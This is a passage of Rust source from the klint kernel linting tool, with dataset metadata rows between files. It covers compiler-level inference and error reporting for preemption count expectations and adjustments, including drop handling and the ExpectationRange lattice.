) -> Result<ExpectationRange, Error> {
Ok(match &terminator.kind {
TerminatorKind::Call { func, .. } => {
let callee_ty = func.ty(body, self.tcx);
let callee_ty = instance.instantiate_mir_and_normalize_erasing_regions(
self.tcx,
typing_env,
ty::EarlyBinder::bind(callee_ty),
);
if let ty::FnDef(def_id, args) = *callee_ty.kind() {
if let Some(v) = self.preemption_count_annotation(def_id).expectation {
// Fast path, no need to resolve the instance.
// This also avoids `TooGeneric` when def_id is an trait method.
v
} else {
let callee_instance =
ty::Instance::try_resolve(self.tcx, typing_env, def_id, args)
.unwrap()
.ok_or(Error::TooGeneric)?;
self.call_stack.borrow_mut().push(UseSite {
instance: typing_env.as_query_input(instance),
kind: UseSiteKind::Call(terminator.source_info.span),
});
let result =
self.instance_expectation(typing_env.as_query_input(callee_instance));
self.call_stack.borrow_mut().pop();
result?
}
} else {
crate::atomic_context::INDIRECT_DEFAULT.1
}
}
TerminatorKind::Drop { place, .. } => {
let ty = place.ty(body, self.tcx).ty;
let ty = instance.instantiate_mir_and_normalize_erasing_regions(
self.tcx,
typing_env,
ty::EarlyBinder::bind(ty),
);
self.call_stack.borrow_mut().push(UseSite {
instance: typing_env.as_query_input(instance),
kind: UseSiteKind::Drop {
drop_span: terminator.source_info.span,
place_span: body.local_decls[place.local].source_info.span,
},
});
let result = self.drop_expectation(typing_env.as_query_input(ty));
self.call_stack.borrow_mut().pop();
result?
}
_ => ExpectationRange::top(),
})
}
#[instrument(skip(self, typing_env, body, diag), fields(instance = %PolyDisplay(&typing_env.as_query_input(instance))), ret)]
pub fn report_body_expectation_error<G: EmissionGuarantee>(
&self,
typing_env: TypingEnv<'tcx>,
instance: Instance<'tcx>,
body: &Body<'tcx>,
expected: ExpectationRange,
span: Option<MultiSpan>,
diag: &mut rustc_errors::Diag<'_, G>,
) -> Result<(), Error> {
let mut analysis_result = AdjustmentComputation {
checker: self,
body,
typing_env,
instance,
}
.iterate_to_fixpoint(self.tcx, body, None)
.into_results_cursor(body);
for (b, data) in rustc_middle::mir::traversal::reachable(body) {
if data.is_cleanup {
continue;
}
let expectation =
self.terminator_expectation(typing_env, instance, body, data.terminator())?;
// Special case for no expectation at all. No need to check adjustment here.
if expectation == ExpectationRange::top() {
continue;
}
analysis_result.seek_to_block_start(b);
let adjustment = analysis_result.get().into_result()?;
let call_expected = expected + adjustment;
if expectation.contains_range(call_expected) {
continue;
}
// This call violates the expectation rules. Go check further.
match &data.terminator().kind {
TerminatorKind::Call { func, .. } => {
let mut span =
span.unwrap_or_else(|| data.terminator().source_info.span.into());
let callee_ty = func.ty(body, self.tcx);
let callee_ty = instance.instantiate_mir_and_normalize_erasing_regions(
self.tcx,
typing_env,
ty::EarlyBinder::bind(callee_ty),
);
if let ty::FnDef(def_id, args) = *callee_ty.kind() {
if let Some(v) = self.preemption_count_annotation(def_id).expectation {
// NOTE: for trait methods, the check above only checks for annotation
// on trait method, but not on impl. After resolution below, we need to
// check again for preemption count annotation!
if !span.has_primary_spans() {
span = self.def_span(def_id).into();
}
diag.span_note(
span,
format!(
"which may call this function with preemption count {}",
expected
),
);
diag.note(format!("but the callee expects preemption count {}", v));
return Ok(());
} else {
let callee_instance =
ty::Instance::try_resolve(self.tcx, typing_env, def_id, args)
.unwrap()
.ok_or(Error::TooGeneric)?;
if !span.has_primary_spans() {
span = self.def_span(callee_instance.def_id()).into();
}
if let Some(v) = self
.preemption_count_annotation(callee_instance.def_id())
.expectation
{
diag.span_note(
span,
format!(
"which may call this function with preemption count {}",
expected
),
);
diag.note(format!("but the callee expects preemption count {}", v));
return Ok(());
}
self.call_stack.borrow_mut().push(UseSite {
instance: typing_env.as_query_input(instance),
kind: UseSiteKind::Call(span.primary_span().unwrap_or(DUMMY_SP)),
});
let result = self.report_instance_expectation_error(
typing_env,
callee_instance,
call_expected,
span,
diag,
);
self.call_stack.borrow_mut().pop();
result?
}
} else {
diag.span_note(
span,
format!(
"which performs indirect function call with preemption count {}",
expected
),
);
diag.note(format!(
"but indirect function calls are assumed to expect {}",
crate::atomic_context::INDIRECT_DEFAULT.1
));
return Ok(());
}
}
TerminatorKind::Drop { place, .. } => {
let span = span.unwrap_or_else(|| {
let mut multispan =
MultiSpan::from_span(data.terminator().source_info.span);
multispan.push_span_label(
body.local_decls[place.local].source_info.span,
"value being dropped is here",
);
multispan
});
let ty = place.ty(body, self.tcx).ty;
let ty = instance.instantiate_mir_and_normalize_erasing_regions(
self.tcx,
typing_env,
ty::EarlyBinder::bind(ty),
);
self.call_stack.borrow_mut().push(UseSite {
instance: typing_env.as_query_input(instance),
kind: UseSiteKind::Drop {
drop_span: data.terminator().source_info.span,
place_span: body.local_decls[place.local].source_info.span,
},
});
let result = self.report_drop_expectation_error(
typing_env,
ty,
call_expected,
span,
diag,
);
self.call_stack.borrow_mut().pop();
result?;
}
_ => (),
};
return Ok(());
}
bug!("failed to report error on {:?}", instance);
}
// Expectation error reporting is similar to expectation inference, but the direction is reverted.
// For inference, we first determine the range of preemption count of the callee, and then combine
// all call-sites to determine the preemption count requirement of the outer function. For reporting,
// we have a pre-determined expectation, and then we need to recurse into the callees to find a violation.
//
// Must only be called on instances that actually are errors.
pub fn report_instance_expectation_error<G: EmissionGuarantee>(
&self,
typing_env: TypingEnv<'tcx>,
instance: Instance<'tcx>,
expected: ExpectationRange,
span: MultiSpan,
diag: &mut rustc_errors::Diag<'_, G>,
) -> Result<(), Error> {
match instance.def {
// No Rust built-in intrinsics will mess with preemption count.
ty::InstanceKind::Intrinsic(_) => unreachable!(),
// Empty drop glue, then it definitely won't mess with preemption count.
ty::InstanceKind::DropGlue(_, None) => unreachable!(),
ty::InstanceKind::DropGlue(_, Some(ty)) => {
return self.report_drop_expectation_error(typing_env, ty, expected, span, diag);
}
// Checked by indirect checks
ty::InstanceKind::Virtual(def_id, _) => {
let exp = self
.preemption_count_annotation(def_id)
.expectation
.unwrap_or(crate::atomic_context::VCALL_DEFAULT.1);
diag.span_note(
span,
format!(
"which may call this dynamic dispatch with preemption count {}",
expected
),
);
diag.note(format!(
"but this dynamic dispatch expects preemption count {}",
exp
));
return Ok(());
}
_ => (),
}
if self.is_foreign_item(instance.def_id()) {
let exp = self
.ffi_property(instance)
.unwrap_or(crate::atomic_context::FFI_USE_DEFAULT)
.1;
diag.span_note(
span,
format!(
"which may perform this FFI call with preemption count {}",
expected
),
);
diag.note(format!("but the callee expects preemption count {}", exp));
return Ok(());
}
// Only check locally codegenned instances.
if !self.tcx.should_codegen_locally(instance) {
let expectation = self.instance_expectation(typing_env.as_query_input(instance))?;
diag.span_note(
span,
format!(
"which may call this function with preemption count {}",
expected
),
);
diag.note(format!(
"but this function expects preemption count {}",
expectation
));
return Ok(());
}
diag.span_note(
span,
format!(
"which may call this function with preemption count {}",
expected
),
);
let body = self.analysis_instance_mir(instance.def);
self.report_body_expectation_error(typing_env, instance, body, expected, None, diag)
}
pub fn report_drop_expectation_error<G: EmissionGuarantee>(
&self,
typing_env: TypingEnv<'tcx>,
ty: Ty<'tcx>,
expected: ExpectationRange,
span: MultiSpan,
diag: &mut rustc_errors::Diag<'_, G>,
) -> Result<(), Error> {
// If the type doesn't need drop, then there is trivially no expectation.
assert!(ty.needs_drop(self.tcx, typing_env));
match ty.kind() {
ty::Closure(_, args) => {
return self.report_drop_expectation_error(
typing_env,
args.as_closure().tupled_upvars_ty(),
expected,
span,
diag,
);
}
// Coroutine drops are non-trivial, use the generated drop shims instead.
ty::Coroutine(..) => (),
ty::Tuple(_list) => (),
_ if let Some(boxed_ty) = ty.boxed_ty() => {
let exp = self.drop_expectation(typing_env.as_query_input(boxed_ty))?;
if !exp.contains_range(expected) {
return self
.report_drop_expectation_error(typing_env, boxed_ty, expected, span, diag);
}
let adj = self.drop_adjustment(typing_env.as_query_input(boxed_ty))?;
let drop_trait = self.require_lang_item(LangItem::Drop, DUMMY_SP);
let drop_fn = self.associated_item_def_ids(drop_trait)[0];
let box_free = ty::Instance::try_resolve(
self.tcx,
typing_env,
drop_fn,
self.mk_args(&[ty.into()]),
)
.unwrap()
.unwrap();
return self.report_instance_expectation_error(
typing_env,
box_free,
expected + adj,
span,
diag,
);
}
ty::Adt(def, _) => {
if let Some(exp) = self.drop_preemption_count_annotation(def.did()).expectation {
diag.span_note(
span,
format!("which may drop here with preemption count {}", expected),
);
diag.note(format!("but this drop expects preemption count {}", exp));
return Ok(());
}
}
ty::Dynamic(pred, ..) => {
let exp = pred
.principal_def_id()
.and_then(|principal_trait| {
self.drop_preemption_count_annotation(principal_trait)
.expectation
})
.unwrap_or(crate::atomic_context::VDROP_DEFAULT.1);
diag.span_note(
span,
format!("which may drop here with preemption count {}", expected),
);
diag.note(format!("but this drop expects preemption count {}", exp));
return Ok(());
}
ty::Array(elem_ty, size) => {
let param_and_elem_ty = typing_env.as_query_input(*elem_ty);
let elem_exp = self.drop_expectation(param_and_elem_ty)?;
if !elem_exp.contains_range(expected) {
return self
.report_drop_expectation_error(typing_env, *elem_ty, expected, span, diag);
}
let elem_adj = self.drop_adjustment(param_and_elem_ty)?;
let infcx = self.tcx.infer_ctxt().build(TypingMode::PostAnalysis);
let size = rustc_trait_selection::traits::evaluate_const(
&infcx,
*size,
typing_env.param_env,
)
.try_to_target_usize(self.tcx)
.ok_or(Error::TooGeneric)?;
let Ok(size) = i32::try_from(size) else {
return Ok(());
};
let Some(last_adj) = (size - 1).checked_mul(elem_adj) else {
return Ok(());
};
return self.report_drop_expectation_error(
typing_env,
*elem_ty,
expected + last_adj,
span,
diag,
);
}
ty::Slice(elem_ty) => {
return self
.report_drop_expectation_error(typing_env, *elem_ty, expected, span, diag);
}
_ => unreachable!(),
}
diag.span_note(
span,
format!(
"which may drop type `{}` with preemption count {}",
PolyDisplay(&typing_env.as_query_input(ty)),
expected,
),
);
let span = MultiSpan::new();
// Do not call `resolve_drop_in_place` because we need typing_env.
let drop_in_place = self.require_lang_item(LangItem::DropInPlace, DUMMY_SP);
let args = self.mk_args(&[ty.into()]);
let instance = ty::Instance::try_resolve(self.tcx, typing_env, drop_in_place, args)
.unwrap()
.unwrap();
let mir = crate::mir::drop_shim::build_drop_shim(self, instance.def_id(), typing_env, ty);
self.report_body_expectation_error(typing_env, instance, &mir, expected, Some(span), diag)
}
pub fn do_infer_expectation(
&self,
typing_env: TypingEnv<'tcx>,
instance: Instance<'tcx>,
body: &Body<'tcx>,
) -> Result<ExpectationRange, Error> {
if false {
let writer = rustc_middle::mir::pretty::MirWriter::new(self.tcx);
writer.write_mir_fn(body, &mut std::io::stderr()).unwrap();
}
let mut analysis_result = AdjustmentComputation {
checker: self,
body,
typing_env,
instance,
}
.iterate_to_fixpoint(self.tcx, body, None)
.into_results_cursor(body);
let mut expectation_infer = ExpectationRange::top();
for (b, data) in rustc_middle::mir::traversal::reachable(body) {
if data.is_cleanup {
continue;
}
let expectation =
self.terminator_expectation(typing_env, instance, body, data.terminator())?;
// Special case for no expectation at all. No need to check adjustment here.
if expectation == ExpectationRange::top() {
continue;
}
analysis_result.seek_to_block_start(b);
let adjustment = analysis_result.get().into_result()?;
// We need to find a range that for all possible values in `adj`, it will end up in a value
// that lands inside `expectation`.
//
// For example, if adjustment is `0..`, and range is `0..1`, then the range we want is `0..0`,
// i.e. an empty range, because no matter what preemption count we start with, if we apply an
// adjustment >0, then it will be outside the range.
let mut expected = expectation - adjustment;
expected.meet(&expectation_infer);
if expected.is_empty() {
// This function will cause the entry state to be in an unsatisfiable condition.
// Generate an error.
let (kind, drop_place) = match data.terminator().kind {
TerminatorKind::Drop { place, .. } => ("drop", Some(place)),
_ => ("call", None),
};
let span = data.terminator().source_info.span;
let mut diag = self.tcx.dcx().struct_span_err(
span,
format!(
"this {kind} expects the preemption count to be {}",
expectation
),
);
if let Some(place) = drop_place {
let span = body.local_decls[place.local].source_info.span;
diag.span_label(span, "the value being dropped is declared here");
let ty = place.ty(body, self.tcx).ty;
let ty = instance.instantiate_mir_and_normalize_erasing_regions(
self.tcx,
typing_env,
ty::EarlyBinder::bind(ty),
);
diag.span_label(span, format!("the type being dropped is `{ty}`"));
}
diag.note(format!(
"but the possible preemption count at this point is {}",
expectation_infer + adjustment
));
// Stop processing other calls in this function to avoid generating too many errors.
return Err(Error::Error(self.emit_with_use_site_info(diag)));
}
expectation_infer = expected;
}
Ok(expectation_infer)
}
pub fn infer_expectation(
&self,
typing_env: TypingEnv<'tcx>,
instance: Instance<'tcx>,
body: &Body<'tcx>,
) -> Result<ExpectationRange, Error> {
if !self
.recursion_limit()
.value_within_limit(self.call_stack.borrow().len())
{
self.emit_with_use_site_info(self.dcx().struct_fatal(format!(
"reached the recursion limit while checking expectation for `{}`",
PolyDisplay(&typing_env.as_query_input(instance))
)));
}
rustc_data_structures::stack::ensure_sufficient_stack(|| {
self.do_infer_expectation(typing_env, instance, body)
})
}
}
memoize!(
#[instrument(skip(cx), fields(poly_ty = %PolyDisplay(&poly_ty)), ret)]
pub fn drop_expectation<'tcx>(
cx: &AnalysisCtxt<'tcx>,
poly_ty: PseudoCanonicalInput<'tcx, Ty<'tcx>>,
) -> Result<ExpectationRange, Error> {
let PseudoCanonicalInput {
typing_env,
value: ty,
} = poly_ty;
// If the type doesn't need drop, then there is trivially no expectation.
if !ty.needs_drop(cx.tcx, typing_env) {
return Ok(ExpectationRange::top());
}
match ty.kind() {
ty::Closure(_, args) => {
return cx.drop_expectation(
typing_env.as_query_input(args.as_closure().tupled_upvars_ty()),
);
}
// Coroutine drops are non-trivial, use the generated drop shims instead.
ty::Coroutine(..) => (),
ty::Tuple(_list) => (),
_ if let Some(boxed_ty) = ty.boxed_ty() => {
let exp = cx.drop_expectation(typing_env.as_query_input(boxed_ty))?;
let drop_trait = cx.require_lang_item(LangItem::Drop, DUMMY_SP);
let drop_fn = cx.associated_item_def_ids(drop_trait)[0];
let box_free = ty::Instance::try_resolve(
cx.tcx,
typing_env,
drop_fn,
cx.mk_args(&[ty.into()]),
)
.unwrap()
.unwrap();
let box_free_exp = cx.instance_expectation(typing_env.as_query_input(box_free))?;
// Usuaully freeing the box shouldn't have any instance expectations, so short circuit here.
if box_free_exp == ExpectationRange::top() {
return Ok(exp);
}
let adj = cx.drop_adjustment(typing_env.as_query_input(boxed_ty))?;
let mut expected = box_free_exp - adj;
expected.meet(&exp);
if expected.is_empty() {
let mut diag = cx.dcx().struct_err(format!(
"freeing the box expects the preemption count to be {}",
box_free_exp
));
diag.note(format!(
"but the possible preemption count after dropping the content is {}",
exp + adj
));
diag.note(format!("content being dropped is `{}`", boxed_ty));
return Err(Error::Error(cx.emit_with_use_site_info(diag)));
}
return Ok(expected);
}
ty::Adt(def, _) => {
// For Adts, we first try to not use any of the args and just try the most
// polymorphic version of the type.
let poly_typing_env = TypingEnv::post_analysis(cx.tcx, def.did());
let poly_args = cx
.erase_and_anonymize_regions(GenericArgs::identity_for_item(cx.tcx, def.did()));
let poly_poly_ty = poly_typing_env
.as_query_input(cx.tcx.mk_ty_from_kind(ty::Adt(*def, poly_args)));
if poly_poly_ty != poly_ty {
match cx.drop_expectation(poly_poly_ty) {
Err(Error::TooGeneric) => (),
expectation => return expectation,
}
}
// If that fails, we try to use the args.
// Fallthrough to the MIR drop shim based logic.
if let Some(exp) = cx.drop_preemption_count_annotation(def.did()).expectation {
info!("expectation {} from annotation", exp);
return Ok(exp);
}
}
ty::Dynamic(pred, ..) => {
if let Some(principal_trait) = pred.principal_def_id() {
if let Some(exp) = cx
.drop_preemption_count_annotation(principal_trait)
.expectation
{
return Ok(exp);
}
}
return Ok(crate::atomic_context::VDROP_DEFAULT.1);
}
ty::Array(elem_ty, size) => {
let infcx = cx.tcx.infer_ctxt().build(TypingMode::PostAnalysis);
let size = rustc_trait_selection::traits::evaluate_const(
&infcx,
*size,
typing_env.param_env,
)
.try_to_target_usize(cx.tcx)
.ok_or(Error::TooGeneric);
if size == Ok(0) {
return Ok(ExpectationRange::top());
}
// Special case for no expectation at all. No need to check adjustment here.
let param_and_elem_ty = typing_env.as_query_input(*elem_ty);
let elem_exp = cx.drop_expectation(param_and_elem_ty)?;
if elem_exp == ExpectationRange::top() {
return Ok(ExpectationRange::top());
}
let elem_adj = cx.drop_adjustment(param_and_elem_ty)?;
if elem_adj == 0 {
return Ok(elem_exp);
}
// If any error happens here, it'll happen in adjustment calculation too, so just return
// to avoid duplicate errors.
let Ok(size) = i32::try_from(size?) else {
return Ok(ExpectationRange::top());
};
let Some(last_adj) = (size - 1).checked_mul(elem_adj) else {
return Ok(ExpectationRange::top());
};
let mut expected = elem_exp - last_adj;
expected.meet(&elem_exp);
if expected.is_empty() {
let mut diag = cx.dcx().struct_err(format!(
"dropping element of array expects the preemption count to be {}",
elem_exp
));
diag.note(format!(
"but the possible preemption count when dropping the last element is {}",
elem_exp + last_adj
));
diag.note(format!("array being dropped is `{}`", ty));
return Err(Error::Error(cx.emit_with_use_site_info(diag)));
}
return Ok(expected);
}
ty::Slice(elem_ty) => {
// We can assume adjustment here is 0 otherwise the adjustment calculation
// logic would have complained.
return cx.drop_expectation(typing_env.as_query_input(*elem_ty));
}
_ => return Err(Error::TooGeneric),
}
// Do not call `resolve_drop_in_place` because we need typing_env.
let drop_in_place = cx.require_lang_item(LangItem::DropInPlace, DUMMY_SP);
let args = cx.mk_args(&[ty.into()]);
let instance = ty::Instance::try_resolve(cx.tcx, typing_env, drop_in_place, args)
.unwrap()
.unwrap();
let poly_instance = typing_env.as_query_input(instance);
assert!(matches!(
instance.def,
ty::InstanceKind::DropGlue(_, Some(_))
));
if cx
.call_stack
.borrow()
.iter()
.rev()
.any(|x| x.instance == poly_instance)
{
// Recursion encountered.
if typing_env.param_env.caller_bounds().is_empty() {
return Ok(ExpectationRange::top());
} else {
// If we are handling generic functions, then defer decision to monomorphization time.
return Err(Error::TooGeneric);
}
}
let mir = crate::mir::drop_shim::build_drop_shim(cx, instance.def_id(), typing_env, ty);
let result = cx.infer_expectation(typing_env, instance, &mir);
// Recursion encountered.
if let Some(&recur) = cx.query_cache::<drop_expectation>().borrow().get(&poly_ty) {
match (result, recur) {
(_, Err(Error::Error(_))) => bug!("recursive callee errors"),
// Error already reported.
(Err(Error::Error(_)), _) => (),
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | true |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/preempt_count/mod.rs | src/preempt_count/mod.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
pub mod adjustment;
pub mod annotation;
pub mod check;
pub mod dataflow;
pub mod expectation;
use rustc_errors::ErrorGuaranteed;
use rustc_mir_dataflow::lattice::FlatSet;
use crate::lattice::MeetSemiLattice;
#[derive(Clone, Copy, Debug, PartialEq, Eq, Encodable, Decodable)]
pub enum Error {
TooGeneric,
Error(ErrorGuaranteed),
}
/// Range of preemption count that the function expects.
///
/// Since the preemption count is a non-negative integer, the lower bound is just represented using a `u32`
/// and "no expectation" is represented with 0; the upper bound is represented using an `Option<u32>`, with
/// `None` representing "no expectation". The upper bound is exclusive so `(0, Some(0))` represents an
/// unsatisfiable condition.
#[derive(Clone, Copy, Debug, PartialEq, Eq, Encodable, Decodable)]
pub struct ExpectationRange {
pub lo: u32,
pub hi: Option<u32>,
}
impl ExpectationRange {
pub const fn top() -> Self {
Self { lo: 0, hi: None }
}
pub const fn single_value(v: u32) -> Self {
Self {
lo: v,
hi: Some(v + 1),
}
}
pub fn is_empty(&self) -> bool {
if let Some(hi) = self.hi {
self.lo >= hi
} else {
false
}
}
pub fn contains_range(&self, mut other: Self) -> bool {
!other.meet(self)
}
}
impl MeetSemiLattice for ExpectationRange {
fn meet(&mut self, other: &Self) -> bool {
let mut changed = false;
if self.lo < other.lo {
self.lo = other.lo;
changed = true;
}
match (self.hi, other.hi) {
(_, None) => (),
(None, Some(_)) => {
self.hi = other.hi;
changed = true;
}
(Some(a), Some(b)) => {
if a > b {
self.hi = Some(b);
changed = true;
}
}
}
changed
}
}
impl std::fmt::Display for ExpectationRange {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
match (self.lo, self.hi) {
(lo, None) => write!(f, "{}..", lo),
(lo, Some(hi)) if lo >= hi => write!(f, "unsatisfiable"),
(lo, Some(hi)) if lo + 1 == hi => write!(f, "{lo}"),
(lo, Some(hi)) => write!(f, "{}..{}", lo, hi),
}
}
}
fn saturating_add(x: u32, y: i32) -> u32 {
let (res, overflow) = x.overflowing_add(y as u32);
if overflow == (y < 0) {
res
} else if overflow {
u32::MAX
} else {
0
}
}
impl std::ops::Add<i32> for ExpectationRange {
type Output = Self;
fn add(self, rhs: i32) -> Self::Output {
Self {
lo: saturating_add(self.lo, rhs),
hi: self.hi.map(|hi| saturating_add(hi, rhs)),
}
}
}
impl std::ops::Sub<i32> for ExpectationRange {
type Output = Self;
fn sub(self, rhs: i32) -> Self::Output {
Self {
lo: saturating_add(self.lo, -rhs),
hi: self.hi.map(|hi| saturating_add(hi, -rhs)),
}
}
}
impl std::ops::Add<FlatSet<i32>> for ExpectationRange {
type Output = Self;
fn add(self, rhs: FlatSet<i32>) -> Self::Output {
match rhs {
FlatSet::Bottom => self,
FlatSet::Elem(v) => self + v,
FlatSet::Top => Self::top(),
}
}
}
impl std::ops::Sub<FlatSet<i32>> for ExpectationRange {
type Output = Self;
fn sub(self, rhs: FlatSet<i32>) -> Self::Output {
match rhs {
FlatSet::Bottom => self,
FlatSet::Elem(v) => self - v,
FlatSet::Top => Self { lo: 0, hi: Some(0) },
}
}
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/preempt_count/adjustment.rs | src/preempt_count/adjustment.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
use rustc_errors::{Diag, EmissionGuarantee, ErrorGuaranteed};
use rustc_hir::LangItem;
use rustc_hir::def_id::CrateNum;
use rustc_middle::mir::{Body, TerminatorKind, UnwindAction};
use rustc_middle::ty::{
self, GenericArgs, Instance, PseudoCanonicalInput, Ty, TypingEnv, TypingMode,
};
use rustc_mir_dataflow::Analysis;
use rustc_mir_dataflow::JoinSemiLattice;
use rustc_mir_dataflow::lattice::FlatSet;
use rustc_span::DUMMY_SP;
use rustc_trait_selection::infer::TyCtxtInferExt;
use super::Error;
use super::dataflow::{AdjustmentComputation, MaybeError};
use crate::ctxt::AnalysisCtxt;
use crate::diagnostic::PolyDisplay;
impl<'tcx> AnalysisCtxt<'tcx> {
fn drop_adjustment_overflow(
&self,
poly_ty: PseudoCanonicalInput<'tcx, Ty<'tcx>>,
) -> Result<!, Error> {
let diag = self.dcx().struct_err(format!(
"preemption count overflow when trying to compute adjustment of type `{}",
PolyDisplay(&poly_ty)
));
Err(Error::Error(self.emit_with_use_site_info(diag)))
}
pub fn emit_with_use_site_info<G: EmissionGuarantee>(
&self,
mut diag: Diag<'tcx, G>,
) -> G::EmitResult {
let call_stack = self.call_stack.borrow();
if call_stack.len() > 4 && !self.recursion_limit().value_within_limit(call_stack.len()) {
// This is recursion limit overflow, we don't want to spam the screen
self.note_use_stack(&mut diag, &call_stack[call_stack.len() - 2..]);
diag.note(format!(
"{} calls omitted due to recursion",
call_stack.len() - 4
));
self.note_use_stack(&mut diag, &call_stack[..2]);
} else {
self.note_use_stack(&mut diag, &call_stack);
}
diag.emit()
}
fn report_adjustment_infer_error<'mir>(
&self,
instance: Instance<'tcx>,
body: &'mir Body<'tcx>,
results: &mut rustc_mir_dataflow::ResultsCursor<
'mir,
'tcx,
AdjustmentComputation<'mir, 'tcx, '_>,
>,
) -> ErrorGuaranteed {
// First step, see if there are any path that leads to a `return` statement have `Top` directly.
let mut return_bb = None;
for (b, data) in rustc_middle::mir::traversal::reachable(body) {
match data.terminator().kind {
TerminatorKind::Return => (),
_ => continue,
}
results.seek_to_block_start(b);
// We can unwrap here because if this function is called, we know that no paths to `Return`
// can contain `TooGeneric` or `Error` otherwise we would have returned early (in caller).
if matches!(results.get().unwrap(), FlatSet::Elem(_)) {
continue;
}
return_bb = Some(b);
break;
}
// A catch-all error. MIR building usually should just have one `Return` terminator
// so this usually shouldn't happen.
let Some(return_bb) = return_bb else {
return self.emit_with_use_site_info(self.tcx.dcx().struct_span_err(
self.tcx.def_span(instance.def_id()),
"cannot infer preemption count adjustment of this function",
));
};
// Find the deepest block in the dominator tree with good value on block start.
let mut first_problematic_block = return_bb;
let dominators = body.basic_blocks.dominators();
loop {
let b = dominators
.immediate_dominator(first_problematic_block)
.expect("block not reachable!");
if b == first_problematic_block {
// Shouldn't actually happen because the entry block should always be good.
break;
}
results.seek_to_block_start(b);
if matches!(results.get().unwrap(), FlatSet::Elem(_)) {
break;
}
first_problematic_block = b;
}
// For this problematic block, try use a span that closest to the beginning of it.
let span = body.basic_blocks[first_problematic_block]
.statements
.first()
.map(|x| x.source_info.span)
.unwrap_or_else(|| {
body.basic_blocks[first_problematic_block]
.terminator()
.source_info
.span
});
let mut diag = self.tcx.dcx().struct_span_err(
span,
"cannot infer preemption count adjustment at this point",
);
let mut count = 0;
for mut prev_block in body.basic_blocks.predecessors()[first_problematic_block]
.iter()
.copied()
{
results.seek_to_block_end(prev_block);
let mut end_adjustment = results.get().unwrap();
results.seek_to_block_start(prev_block);
let mut start_adjustment = results.get().unwrap();
// If this block has made no changes to the adjustment, backtrack to the predecessors block
// that made the change.
while start_adjustment == end_adjustment {
let pred = &body.basic_blocks.predecessors()[prev_block];
// Don't continue backtracking if there are multiple predecessors.
if pred.len() != 1 {
break;
}
let b = pred[0];
// Don't continue backtracking if the predecessor block has multiple successors.
let terminator = body.basic_blocks[b].terminator();
let successor_count = terminator.successors().count();
let has_unwind = terminator
.unwind()
.map(|x| matches!(x, UnwindAction::Cleanup(_)))
.unwrap_or(false);
let normal_successor = successor_count - has_unwind as usize;
if normal_successor != 1 {
break;
}
prev_block = b;
results.seek_to_block_end(prev_block);
end_adjustment = results.get().unwrap();
results.seek_to_block_start(prev_block);
start_adjustment = results.get().unwrap();
}
let terminator = body.basic_blocks[prev_block].terminator();
let span = match terminator.kind {
TerminatorKind::Goto { .. } => {
// Goto terminator of `if .. { .. } else { .. }` has span on the entire expression,
// which is not very useful.
// In this case we use the last statement's span instead.
body.basic_blocks[prev_block]
.statements
.last()
.map(|x| x.source_info)
.unwrap_or_else(|| terminator.source_info)
.span
}
_ => terminator.source_info.span,
};
let mut msg = match (start_adjustment, end_adjustment) {
(FlatSet::Bottom, _) | (_, FlatSet::Bottom) => unreachable!(),
(FlatSet::Top, _) => {
format!(
"preemption count adjustment is changed in the previous iteration of the loop"
)
}
(_, FlatSet::Top) => unreachable!(),
(_, FlatSet::Elem(elem)) => {
format!("preemption count adjustment is {} after this", elem)
}
};
match count {
0 => (),
1 => msg = format!("while {}", msg),
_ => msg = format!("and {}", msg),
}
count += 1;
diag.span_note(span, msg);
}
self.emit_with_use_site_info(diag)
}
pub fn do_infer_adjustment(
&self,
typing_env: TypingEnv<'tcx>,
instance: Instance<'tcx>,
body: &Body<'tcx>,
) -> Result<i32, Error> {
if self.should_dump_mir(instance.def_id()) {
let writer = rustc_middle::mir::pretty::MirWriter::new(self.tcx);
writer.write_mir_fn(body, &mut std::io::stderr()).unwrap();
}
let mut analysis_result = AdjustmentComputation {
checker: self,
body,
typing_env,
instance,
}
.iterate_to_fixpoint(self.tcx, body, None)
.into_results_cursor(body);
let mut adjustment = MaybeError::Ok(FlatSet::Bottom);
for (b, data) in rustc_middle::mir::traversal::reachable(body) {
match data.terminator().kind {
TerminatorKind::Return => {
analysis_result.seek_to_block_start(b);
adjustment.join(analysis_result.get());
}
_ => (),
}
}
let adjustment = adjustment.into_result()?;
let adjustment = match adjustment {
FlatSet::Bottom => {
// Diverging function, any value is fine, use the default 0.
0
}
FlatSet::Elem(v) => v,
FlatSet::Top => {
return Err(Error::Error(self.report_adjustment_infer_error(
instance,
body,
&mut analysis_result,
)));
}
};
Ok(adjustment)
}
pub fn infer_adjustment(
&self,
typing_env: TypingEnv<'tcx>,
instance: Instance<'tcx>,
body: &Body<'tcx>,
) -> Result<i32, Error> {
if !self
.recursion_limit()
.value_within_limit(self.call_stack.borrow().len())
{
self.emit_with_use_site_info(self.dcx().struct_fatal(format!(
"reached the recursion limit while checking adjustment for `{}`",
PolyDisplay(&typing_env.as_query_input(instance))
)));
}
rustc_data_structures::stack::ensure_sufficient_stack(|| {
self.do_infer_adjustment(typing_env, instance, body)
})
}
}
memoize!(
#[instrument(skip(cx), fields(poly_ty = %PolyDisplay(&poly_ty)), ret)]
pub fn drop_adjustment<'tcx>(
cx: &AnalysisCtxt<'tcx>,
poly_ty: PseudoCanonicalInput<'tcx, Ty<'tcx>>,
) -> Result<i32, Error> {
let PseudoCanonicalInput {
typing_env,
value: ty,
} = poly_ty;
// If the type doesn't need drop, then there is trivially no adjustment.
if !ty.needs_drop(cx.tcx, typing_env) {
return Ok(0);
}
match ty.kind() {
ty::Closure(_, args) => {
return cx.drop_adjustment(
typing_env.as_query_input(args.as_closure().tupled_upvars_ty()),
);
}
// Coroutine drops are non-trivial, use the generated drop shims instead.
ty::Coroutine(..) => (),
ty::Tuple(list) => {
let mut adj = 0i32;
for elem_ty in list.iter() {
let elem_adj = cx.drop_adjustment(typing_env.as_query_input(elem_ty))?;
let Some(new_adj) = adj.checked_add(elem_adj) else {
cx.drop_adjustment_overflow(poly_ty)?
};
